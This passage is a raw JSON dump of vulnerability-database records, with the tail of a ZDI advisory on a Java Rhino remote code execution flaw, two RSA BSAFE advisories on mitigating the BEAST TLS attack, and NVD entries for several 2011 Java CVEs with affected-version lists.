Java. User interaction is required to\r\nexploit this vulnerability in that the target must visit a malicious\r\npage or open a malicious file.\r\n\r\nThe specific flaw exists within the way Java handles Rhino Javascript\r\nerrors. The built-in javascript engine in Java fails to perform\r\nsufficient sanitation on javascript error objects. The effect is that\r\nuntrusted code can run in privileged context. This can result in remote\r\ncode execution under the context of the current user.\r\n\r\n-- Vendor Response:\r\n\r\nOracle has issued an update to correct this vulnerability. More details\r\ncan be found at:\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html\r\n\r\n\r\n\r\n-- Disclosure Timeline:\r\n2011-05-12 - Vulnerability reported to vendor\r\n2011-10-26 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n\r\n* Michael Schierl\r\n\r\n\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents\r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2011-10-31T00:00:00", "title": "ZDI-11-305 : Oracle Java Applet Rhino Script Engine Remote Code Execution Vulnerability", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:42", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2011-3544"], "modified": "2011-10-31T00:00:00", "id": "SECURITYVULNS:DOC:27221", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27221", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:52", "references": [], "description": "\r\n\r\n\r\n\r\nESA-2012-032.txt\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nESA-2012-032: RSA BSAFE\u00ae Micro Edition Suite Security Update for BEAST (Browser Exploit Against SSL/TLS) attacks\r\n\r\nEMC Identifier: ESA-2012-032\r\n \r\nCVE Identifier: CVE-2011-3389\r\n \r\nSeverity Rating: CVSS v2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)\r\n \r\nAffected Products:\r\nAll versions of RSA BSAFE Micro Edition Suite (MES) except 4.0.5 and 3.2.6, all platforms\r\n \r\nUnaffected Products:\r\nRSA BSAFE MES 4.0.5, 3.2.6\r\n \r\nSummary: \r\nRSA BSAFE Micro Edition Suite contains updates designed to help prevent BEAST attacks (CVE-2011-3389)\r\n \r\nDetails: \r\nThere is a known vulnerability in SSLv3 and TLS v1.0 to do with how the Initialization Vector (IV) is generated. For symmetric key algorithms in CBC mode, the IV for the first record is generated using keys and secrets set during the SSL or TLS handshake. All subsequent records are encrypted using the ciphertext block from the previous record as the IV. With symmetric key encryption in CBC mode, plain text encrypted with the same IV and key generates the same cipher text, which is why having a variable IV is important.\r\n \r\nThe BEAST exploit uses this SSLv3 and TLS v1.0 vulnerability by allowing an attacker to observe the last ciphertext block, which is the IV, then replace this with an IV of their choice, inject some of their own plain text data, and when this new IV is used to encrypt the data, the attacker can guess the plain text data one byte at a time.\r\n \r\nRecommendation:\r\nThe best way to help prevent this attack is to use TLS v1.1 or higher. The vulnerability to do with IV generation was fixed in TLS v1.1 (released in 2006) so implementations using only TLS v1.1 or v1.2 are engineered to be secure against the BEAST exploit. However, support for these higher level protocols is limited to a smaller number of applications, so supporting only TLS v1.1 or v1.2 might cause interoperability issues.\r\n \r\nA second solution is to limit the negotiated cipher suites to exclude those that do not require symmetric key algorithms in CBC mode. However, this substantially restricts the number of cipher suites that can be negotiated. That is, only cipher suites with NULL encryption or cipher suites with streaming encryption algorithms (the RC4 algorithm) could be negotiated, which might result in reduced security.\r\n \r\nIn MES, the way to prevent the BEAST exploit is to introduce some unknown data into the encryption scheme, prior to the attackers inserted plain text data. This is done as follows:\r\n \r\n1. After the first encrypted record is sent, any plaintext to be encrypted is split into two blocks of plaintext. The blocks of data are then sent as two encrypted records; the first encrypted record contains the first byte of data and the second encrypted record contains the rest.\r\n2. A MAC is generated from the one byte of data, the MAC key, and an increasing counter. This MAC is included in the first block of plaintext.\r\n3. The one byte of data along with the MAC is encrypted and becomes the IV for the next block. Because the IV is now essentially random data, it is impossible for an attacker to predict it and replace it with one of their own.\r\n \r\nNOTE: In this release of MES, the mitigation for the BEAST exploit is enabled by default. No code changes are required to protect against it.\r\n \r\nIn special cases, if required, the BEAST exploit mitigation, either for an SSL context or SSL object can be disabled by calling R_SSL_CTX_set_options_by_type() or R_SSL_set_options_by_type() respectively, with the SSL_OP_TYPE_SECURITY option type and the SSL_OP_NO_BEAST_MITIGATION identifier.\r\n \r\nNote the following about first block splitting:\r\n\u00b7 Splitting only occurs for negotiated cipher suites that use CBC mode.\r\n\u00b7 Handshake packets are not split. Only application data packets are split.\r\n\u00b7 Blocks of plaintext are split for each subsequent call to write data to the SSL connection after the first write is sent.\r\n \r\nFor more information about these functions and identifiers, see the RSA BSAFE MES API Reference Guide.\r\n \r\nObtaining Downloads: \r\nTo request your upgrade of the software, please call your local support telephone number (contact phone numbers are available at http://www.emc.com/support/rsa/contact/phone-numbers.htm) for most expedient service. \r\n\r\nObtaining Documentation:\r\nTo obtain RSA documentation, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose documentation you want to obtain. Scroll to the section for the product version that you want and click the set link.\r\n\r\nSeverity Rating:\r\nFor an explanation of Severity Ratings, refer to the Knowledge Base Article, \u201cSecurity Advisories Severity Rating\u201d at https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability.\r\n\r\nObtaining More Information:\r\nFor more information about RSA products, visit the RSA web site at http://www.rsa.com.\r\n\r\nGetting Support and Service:\r\nFor customers with current maintenance contracts, contact your local RSA Customer Support center with any additional questions regarding this RSA SecurCare Note. For contact telephone numbers or e-mail addresses, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help & Contact, and then click the Contact Us - Phone tab or the Contact Us - Email tab.\r\n\r\nGeneral Customer Support Information:\r\nhttp://www.emc.com/support/rsa/index.htm\r\n\r\nRSA SecurCare Online:\r\nhttps://knowledge.rsasecurity.com\r\n\r\nEOPS Policy:\r\nRSA has a defined End of Primary Support policy associated with all major versions. Please refer to the link below for additional details. \r\nhttp://www.emc.com/support/rsa/eops/index.htm\r\n\r\nSecurCare Online Security Advisories\r\nRSA, The Security Division of EMC, distributes SCOL Security Advisories in order to bring to the attention of users of the affected RSA products important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. RSA disclaim all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall RSA or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nAbout RSA SecurCare Notes & Security Advisories Subscription\r\nRSA SecurCare Notes & Security Advisories are targeted e-mail messages that RSA sends you based on the RSA product family you currently use. If you\u2019d like to stop receiving RSA SecurCare Notes & Security Advisories, or if you\u2019d like to change which RSA product family Notes & Security Advisories you currently receive, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com/scolcms/help.aspx?_v=view3. Following the instructions on the page, remove the check mark next to the RSA product family whose Notes & Security Advisories you no longer want to receive. Click the Submit button to save your selection.\r\n\r\nSincerely,\r\nRSA Customer Support\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (Cygwin)\r\n\r\niEYEARECAAYFAlNIFjYACgkQtjd2rKp+ALwv3wCgx/mvkF8UsYt+YHuSuvFi+bS4\r\nehYAoMwjDiemy19XL7m8RH5Y52t2y5Fj\r\n=bLjw\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-05-05T00:00:00", "title": "ESA-2012-032: RSA BSAFE\u00ae Micro Edition Suite Security Update for BEAST (Browser Exploit Against SSL/TLS) attacks", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:52", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2011-3389"], "modified": "2014-05-05T00:00:00", "id": "SECURITYVULNS:DOC:30611", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30611", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:46", "references": [], "description": "\r\n\r\n\r\n\r\nESA-2012-032.txt\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nESA-2012-032: RSA BSAFE\u00ae Micro Edition Suite Security Update for BEAST (Browser Exploit Against SSL/TLS) attacks\r\n\r\nEMC Identifier: ESA-2012-032\r\n\r\nCVE Identifier: CVE-2011-3389\r\n\r\nSeverity Rating: CVSS v2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)\r\n\r\n\r\nAffected Products:\r\n\r\nAll versions of RSA BSAFE Micro Edition Suite prior to 4.0, all platforms\r\n\r\n\r\nUnaffected Products:\r\n\r\nRSA BSAFE Micro Edition Suite 4.0 and higher\r\n\r\n\r\nSummary:\r\n\r\nRSA BSAFE Micro Edition Suite contains updates designed to prevent BEAST attacks (CVE-2011-3389)\r\n\r\n\r\n\r\nDetails:\r\n\r\nThere is a known vulnerability in SSLv3 and TLS v1.0 to do with how the Initialization Vector (IV) is generated. For symmetric key algorithms in CBC mode, the IV for the first record is generated using keys and secrets set during the SSL or TLS handshake. All subsequent records are encrypted using the ciphertext block from the previous record as the IV. With symmetric key encryption in CBC mode, plain text encrypted with the same IV and key generates the same cipher text, which is why having a variable IV is important.\r\n\r\nThe BEAST exploit uses this SSLv3 and TLS v1.0 vulnerability by allowing an attacker to observe the last ciphertext block, which is the IV, then replace this with an IV of their choice, inject some of their own plain text data, and when this new IV is used to encrypt the data, the attacker can guess the plain text data one byte at a time.\r\n\r\n\r\n\r\nRecommendation:\r\n\r\nThe best way to help prevent this attack is to use TLS v1.1 or higher. The vulnerability to do with IV generation was fixed in TLS v1.1 (released in 2006) so implementations using only TLS v1.1 or v1.2 are engineered to be secure against the BEAST exploit. However, support for these higher level protocols is limited to a smaller number of applications, so supporting only TLS v1.1 or v1.2 might cause interoperability issues.\r\n\r\nA second solution is to limit the negotiated cipher suites to exclude those that do not require symmetric key algorithms in CBC mode. However, this substantially restricts the number of cipher suites that can be negotiated. That is, only cipher suites with NULL encryption or cipher suites with streaming encryption algorithms (the RC4 algorithm) could be negotiated, which might result in reduced security.\r\n\r\nFor customers who cannot or should not implement either of these two methods, RSA BSAFE Micro Edition Suite 4.0 introduces a new feature called first block splitting. First block splitting prevents the BEAST exploit by introducing unknown data into the encryption scheme prior to the attackers inserted plain text data. This is done as follows: \r\n\r\n\u20221. The first plain text block to be encrypted is split into two blocks. The first block contains the first byte of the data, the second block contains the rest.\r\n\u20222. A MAC is generated from the one byte of data, the MAC key, and an increasing counter. This MAC is included in the first block.\r\n\u20223. The one byte of data, along with the MAC, is encrypted and becomes the IV for the next block. Because the IV is now essentially random data, it is impossible for an attacker to predict it and replace it with one of their own.\r\nTo implement first block splitting in RSA BSAFE Micro Edition Suite 4.0, either for an SSL context or SSL object, call R_SSL_CTX_set_options_by_type() or R_SSL_set_options_by_type() respectively, with the SSL_OP_TYPE_SECURITY option type and the SSL_OP_SPLIT_FIRST_FRAGMENT identifier.\r\n\r\nFor more information about these functions and identifiers, see the RSA BSAFE Micro Edition Suite API Reference Guide.\r\n\r\n\r\n\r\nSeverity Rating:\r\n\r\nFor an explanation of Severity Ratings, refer to the Knowledge Base Article, \u201cSecurity Advisories Severity Rating\u201d at https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability.\r\n\r\n\r\nObtaining Documentation:\r\n\r\nTo obtain RSA documentation, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose documentation you want to obtain. Scroll to the section for the product version that you want and click the set link.\r\n\r\n\r\n\r\nObtaining More Information:\r\n\r\nFor more information about RSA BSAFE, visit the RSA web site at http://www.rsa.com/node.aspx?id=1204.\r\n\r\n\r\n\r\nGetting Support and Service:\r\n\r\nFor customers with current maintenance contracts, contact your local RSA Customer Support center with any additional questions regarding this RSA SecurCare Note. For contact telephone numbers or e-mail addresses, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help & Contact, and then click the Contact Us - Phone tab or the Contact Us - Email tab.\r\n\r\n\r\nGeneral Customer Support Information:\r\n\r\nhttp://www.rsa.com/node.aspx?id=1264\r\n\r\n\r\nRSA SecurCare Online:\r\n\r\nhttps://knowledge.rsasecurity.com\r\n\r\n\r\nEOPS Policy:\r\n\r\nRSA has a defined End of Primary Support policy associated with all major versions. Please refer to the link below for additional details. \r\nhttp://www.rsa.com/node.aspx?id=2575\r\n\r\n\r\nSecurCare Online Security Advisories\r\n\r\nRSA, The Security Division of EMC, distributes SCOL Security Advisories in order to bring to the attention of users of the affected RSA products important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. RSA disclaim all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall RSA or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\n\r\nAbout RSA SecurCare Notes & Security Advisories Subscription\r\n\r\nRSA SecurCare Notes & Security Advisories are targeted e-mail messages that RSA sends you based on the RSA product family you currently use. If you\u2019d like to stop receiving RSA SecurCare Notes & Security Advisories, or if you\u2019d like to change which RSA product family Notes & Security Advisories you currently receive, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com/scolcms/help.aspx?_v=view3. Following the instructions on the page, remove the check mark next to the RSA product family whose Notes & Security Advisories you no longer want to receive. Click the Submit button to save your selection.\r\n\r\n\r\nEMC Product Security Response Center\r\n\r\nSecurity_Alert@EMC.COM\r\n\r\nhttp://www.emc.com/contact-us/contact/product-security-response-center.html\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (Cygwin)\r\n\r\niEYEARECAAYFAlBKOMwACgkQtjd2rKp+ALw1HQCfezG65rzhhtvVQAFkXzXQmthr\r\nCc8An3CJlTmuxBfF1dHt/NvQgKED9eR4\r\n=++hy\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2012-10-29T00:00:00", "title": "ESA-2012-032: RSA BSAFE(r) Micro Edition Suite Security Update for BEAST (Browser Exploit Against SSL/TLS) attacks", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:46", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2011-3389"], "modified": "2012-10-29T00:00:00", "id": "SECURITYVULNS:DOC:28707", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28707", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "cve": [{"lastseen": "2018-01-06T12:20:51", "references": ["http://www.securityfocus.com/bid/50224", "http://www.redhat.com/support/errata/RHSA-2011-1384.html", "http://www.ibm.com/developerworks/java/jdk/alerts/", "http://rhn.redhat.com/errata/RHSA-2013-1455.html", "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", "http://secunia.com/advisories/48308", "http://marc.info/?l=bugtraq&m=134254957702612&w=2", "http://www.ubuntu.com/usn/USN-1263-1", "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", "http://www.securitytracker.com/id?1026215", "http://marc.info/?l=bugtraq&m=134254866602253&w=2", "http://marc.info/?l=bugtraq&m=132750579901589&w=2", "http://security.gentoo.org/glsa/glsa-201406-32.xml", "https://exchange.xforce.ibmcloud.com/vulnerabilities/70842"], "description": "Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, and JRockit R28.1.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.", "edition": 5, "reporter": "NVD", "published": "2011-10-19T17:55:01", "title": "CVE-2011-3551", "type": "cve", "enchantments": {"score": {"modified": "2018-01-06T12:20:51", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:14318", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14318"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2011-3551"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:14318", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:14318"}], "modified": "2018-01-05T21:29:20", "cpe": ["cpe:/a:sun:jre:1.6.0:update_20", "cpe:/a:sun:jdk:1.6.0:update_17", "cpe:/a:sun:jre:1.6.0:update_25", "cpe:/a:sun:jre:1.6.0:update_22", "cpe:/a:sun:jre:1.6.0:update_2", "cpe:/a:sun:jre:1.6.0:update_7", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.6.0:update_27", "cpe:/a:sun:jre:1.6.0:update_17", "cpe:/a:oracle:jrockit:r28.0.0", "cpe:/a:sun:jdk:1.6.0:update_22", "cpe:/a:sun:jdk:1.6.0:update_19", "cpe:/a:sun:jre:1.6.0:update_13", "cpe:/a:sun:jdk:1.6.0:update2", "cpe:/a:sun:jre:1.6.0:update_3", "cpe:/a:sun:jre:1.6.0:update_1", "cpe:/a:sun:jdk:1.6.0:update_15", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jdk:1.6.0:update_20", "cpe:/a:sun:jdk:1.6.0:update_5", "cpe:/a:sun:jre:1.6.0:update_24", "cpe:/a:sun:jre:1.6.0:update_4", "cpe:/a:sun:jre:1.6.0:update_11", "cpe:/a:oracle:jrockit:r28.1.0", "cpe:/a:sun:jre:1.6.0:update_10", "cpe:/a:sun:jdk:1.6.0:update_16", "cpe:/a:sun:jdk:1.6.0:update_18", "cpe:/a:oracle:jrockit:r28.1.1", "cpe:/a:sun:jdk:1.6.0:update_4", "cpe:/a:sun:jre:1.6.0:update_23", "cpe:/a:sun:jdk:1.6.0:update_11", "cpe:/a:sun:jdk:1.6.0:update_21", "cpe:/a:oracle:jrockit:r28.1.4", "cpe:/a:sun:jdk:1.6.0:update_24", "cpe:/a:sun:jdk:1.6.0:update_26", "cpe:/a:sun:jdk:1.7.0", "cpe:/a:sun:jdk:1.6.0:update_13", "cpe:/a:sun:jdk:1.6.0:update_23", "cpe:/a:sun:jdk:1.6.0:update1", "cpe:/a:oracle:jrockit:r28.0.2", "cpe:/a:sun:jdk:1.6.0:update_25", "cpe:/a:sun:jdk:1.6.0:update_6", "cpe:/a:sun:jre:1.6.0:update_5", "cpe:/a:sun:jre:1.6.0:update_19", "cpe:/a:sun:jdk:1.6.0:update_10", "cpe:/a:sun:jdk:1.6.0:update_12", "cpe:/a:sun:jre:1.6.0:update_16", "cpe:/a:sun:jre:1.6.0:update_18", "cpe:/a:sun:jre:1.6.0:update_14", "cpe:/a:sun:jre:1.6.0:update_12", "cpe:/a:sun:jre:1.6.0:update_6", "cpe:/a:oracle:jrockit:r28.1.3", "cpe:/a:sun:jre:1.6.0:update_21", "cpe:/a:sun:jdk:1.6.0:update_3", "cpe:/a:sun:jre:1.6.0:update_15", "cpe:/a:oracle:jrockit:r28.0.1", "cpe:/a:sun:jre:1.7.0", "cpe:/a:sun:jdk:1.6.0:update_14", "cpe:/a:sun:jdk:1.6.0:update_27", "cpe:/a:sun:jre:1.6.0:update_26", "cpe:/a:sun:jdk:1.6.0:update_7"], "id": "CVE-2011-3551", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3551", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T12:20:51", "references": ["http://www.securityfocus.com/bid/50242", "http://www.redhat.com/support/errata/RHSA-2011-1384.html", "http://www.ibm.com/developerworks/java/jdk/alerts/", "https://exchange.xforce.ibmcloud.com/vulnerabilities/70835", "http://secunia.com/advisories/48308", "http://marc.info/?l=bugtraq&m=134254957702612&w=2", "http://www.ubuntu.com/usn/USN-1263-1", "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", "http://www.securitytracker.com/id?1026215", "http://marc.info/?l=bugtraq&m=134254866602253&w=2", "http://marc.info/?l=bugtraq&m=132750579901589&w=2", "http://security.gentoo.org/glsa/glsa-201406-32.xml"], "description": "Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to HotSpot.", "edition": 5, "reporter": "NVD", "published": "2011-10-19T17:55:01", "title": "CVE-2011-3558", "type": "cve", "enchantments": {"score": {"modified": "2018-01-06T12:20:51", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:13475", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A13475"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2011-3558"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:13475", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:13475"}], "modified": "2018-01-05T21:29:21", "cpe": ["cpe:/a:sun:jre:1.6.0:update_20", "cpe:/a:sun:jdk:1.6.0:update_17", "cpe:/a:sun:jre:1.6.0:update_25", "cpe:/a:sun:jre:1.6.0:update_22", "cpe:/a:sun:jre:1.6.0:update_2", "cpe:/a:sun:jre:1.6.0:update_7", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.6.0:update_27", "cpe:/a:sun:jre:1.6.0:update_17", "cpe:/a:sun:jdk:1.6.0:update_22", "cpe:/a:sun:jdk:1.6.0:update_19", "cpe:/a:sun:jre:1.6.0:update_13", "cpe:/a:sun:jdk:1.6.0:update2", "cpe:/a:sun:jre:1.6.0:update_3", "cpe:/a:sun:jre:1.6.0:update_1", "cpe:/a:sun:jdk:1.6.0:update_15", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jdk:1.6.0:update_20", "cpe:/a:sun:jdk:1.6.0:update_5", "cpe:/a:sun:jre:1.6.0:update_24", "cpe:/a:sun:jre:1.6.0:update_4", "cpe:/a:sun:jre:1.6.0:update_11", "cpe:/a:sun:jre:1.6.0:update_10", "cpe:/a:sun:jdk:1.6.0:update_16", "cpe:/a:sun:jdk:1.6.0:update_18", "cpe:/a:sun:jdk:1.6.0:update_4", "cpe:/a:sun:jre:1.6.0:update_23", "cpe:/a:sun:jdk:1.6.0:update_11", "cpe:/a:sun:jdk:1.6.0:update_21", "cpe:/a:sun:jdk:1.6.0:update_24", "cpe:/a:sun:jdk:1.6.0:update_26", "cpe:/a:sun:jdk:1.7.0", "cpe:/a:sun:jdk:1.6.0:update_13", "cpe:/a:sun:jdk:1.6.0:update_23", "cpe:/a:sun:jdk:1.6.0:update1", "cpe:/a:sun:jdk:1.6.0:update_25", "cpe:/a:sun:jdk:1.6.0:update_6", "cpe:/a:sun:jre:1.6.0:update_5", "cpe:/a:sun:jre:1.6.0:update_19", "cpe:/a:sun:jdk:1.6.0:update_10", "cpe:/a:sun:jdk:1.6.0:update_12", "cpe:/a:sun:jre:1.6.0:update_16", "cpe:/a:sun:jre:1.6.0:update_18", "cpe:/a:sun:jre:1.6.0:update_14", "cpe:/a:sun:jre:1.6.0:update_12", "cpe:/a:sun:jre:1.6.0:update_6", "cpe:/a:sun:jre:1.6.0:update_21", "cpe:/a:sun:jdk:1.6.0:update_3", "cpe:/a:sun:jre:1.6.0:update_15", "cpe:/a:sun:jre:1.7.0", "cpe:/a:sun:jdk:1.6.0:update_14", "cpe:/a:sun:jdk:1.6.0:update_27", "cpe:/a:sun:jre:1.6.0:update_26", "cpe:/a:sun:jdk:1.6.0:update_7"], "id": "CVE-2011-3558", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3558", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-06T12:20:51", "references": ["http://www.redhat.com/support/errata/RHSA-2011-1384.html", "http://marc.info/?l=bugtraq&m=133365109612558&w=2", "http://www.redhat.com/support/errata/RHSA-2012-0006.html", "http://www.ibm.com/developerworks/java/jdk/alerts/", "http://rhn.redhat.com/errata/RHSA-2013-1455.html", "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", "http://secunia.com/advisories/48308", "http://marc.info/?l=bugtraq&m=134254957702612&w=2", "http://marc.info/?l=bugtraq&m=133728004526190&w=2", "http://www.ubuntu.com/usn/USN-1263-1", "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", "http://www.securitytracker.com/id?1026215", "http://www.securityfocus.com/bid/50211", "http://marc.info/?l=bugtraq&m=134254866602253&w=2", "https://exchange.xforce.ibmcloud.com/vulnerabilities/70845", "http://marc.info/?l=bugtraq&m=132750579901589&w=2", "http://security.gentoo.org/glsa/glsa-201406-32.xml", "http://www.redhat.com/support/errata/RHSA-2011-1478.html"], "description": "Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, and 1.4.2_33 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability, related to AWT.", "edition": 5, "reporter": "NVD", "published": "2011-10-19T17:55:01", "title": "CVE-2011-3548", "type": "cve", "enchantments": {"score": {"modified": "2018-01-06T12:20:51", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:14492", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14492"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2011-3548"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:14492", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:14492"}], "modified": "2018-01-05T21:29:19", "cpe": ["cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jdk:1.5.0:update9", "cpe:/a:sun:jre:1.6.0:update_20", "cpe:/a:sun:jre:1.4.2_21", "cpe:/a:sun:jdk:1.4.2_9", "cpe:/a:sun:jdk:1.5.0:update12", "cpe:/a:sun:jre:1.4.2_31", "cpe:/a:sun:jdk:1.5.0:update26", "cpe:/a:sun:jdk:1.6.0:update_17", "cpe:/a:sun:jre:1.6.0:update_25", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:jre:1.6.0:update_22", "cpe:/a:sun:jdk:1.5.0:update3", "cpe:/a:sun:jdk:1.4.2_23", "cpe:/a:sun:jre:1.6.0:update_2", "cpe:/a:sun:jre:1.6.0:update_7", "cpe:/a:sun:jdk:1.5.0:update27", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jdk:1.4.2_14", "cpe:/a:sun:jre:1.6.0:update_27", "cpe:/a:sun:jdk:1.5.0:update8", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.6.0:update_17", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.5.0:update3", "cpe:/a:sun:jre:1.4.2_19", "cpe:/a:sun:jdk:1.5.0:update16", "cpe:/a:sun:jre:1.5.0:update13", "cpe:/a:sun:jdk:1.4.2_26", "cpe:/a:sun:jre:1.5.0:update16", "cpe:/a:sun:jre:1.5.0:update26", "cpe:/a:sun:jdk:1.6.0:update_22", "cpe:/a:sun:jdk:1.6.0:update_19", "cpe:/a:sun:jre:1.6.0:update_13", 